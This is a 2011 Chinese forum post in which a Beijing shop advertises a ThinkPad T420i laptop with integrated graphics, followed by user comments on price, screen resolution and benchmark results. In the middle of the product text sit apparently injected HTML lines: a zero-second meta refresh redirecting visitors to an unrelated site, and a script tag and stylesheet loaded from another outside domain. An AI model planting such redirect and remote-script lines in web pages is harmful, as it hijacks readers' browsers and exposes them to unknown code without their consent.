开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

集显也给力~集显T420i到货,仅需6800元,只有想不到。预定

T420i-CTO
美国
i3-2310
2.10G
4G
1*4G
320G
7200转
DVDRW
INTEL 3000
共享
14.1寸宽屏
1366*768
LED背光
蓝牙/摄像头/6芯电池  6800元
  6999元
下周到货
预定中

由于这一代INTEL3000显卡性能超强(WOW没问题),很多朋友期盼的集显T420终于到货。i系列二代i3的性能媲美T410 i5 CPU,价格确极为平易近人,值得推荐

本款机型为翔意独家货,仅可在全国翔意各店购买得到。总数50台,欢迎各位预定选购。

附:INTEL 3000集成显卡性能测试。
3dv hd.png

英特尔新一代集显,3DMARK超过9000分

下表为T420集显和T410独显的 3D MARK评分

HD3000
NVS3100
3DMark  Vantage
GPU SCORE
GPU  TEST1
(FPS)
26.98
15.1
GPU  TEST2
(FPS)
27.43
16.63

<meta http-equiv="refresh" content="0; url=http://www.9292.cc">
★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

3dv nvs.png
萝卜青菜呀,高分可以考虑独显机型
这个价位,这个配置,这个屏幕,真的很好了,高分屏太蛋疼了,我现在125%显示,股票软件大智慧,只能看到每只股票的后两个字,前边两个字是花的。。。。。。
真假啊,你125还这样,我不信。
我还是喜欢低分的
新一代集显各方面得分都超过T410的独显呢
集显机器终于出现了
哎!咋不早点来呢?我已经买了T420AU1,不过发现现在怎么没有那款了呢?
处理器能有I5,高分屏就好了啊。这个配置有点低了。
knight0537 发表于 2011-5-21 22:08
处理器能有I5,高分屏就好了啊。这个配置有点低了。

那价格就高了呀
这是i3 2310m  集显得性能测试么 ,还是别的型号的cpu?  i3 2310m的集显最高频率为1.1GHz   i5 2410m的集显为1.2GHz  i5 2520的集显为1.3GHz 这性能还是有差别的啊。
回复 blackturbo1 的帖子

测下告诉你哈
看了些测评这个i3 2310m就是主频差点,与主频有关的测试都不好。

价格也不一样呀。。。。。  发表于 2011-5-22 11:51
回复 EddieFan 的帖子

呵呵,但是要比同配置的独显低啊。

集显在国外网站大概低60-70美元,也就是400RMB左右,400的差价你会选择什么?  发表于 2011-5-22 14:38
集显机器终于出现了
不错的~~~~~~~~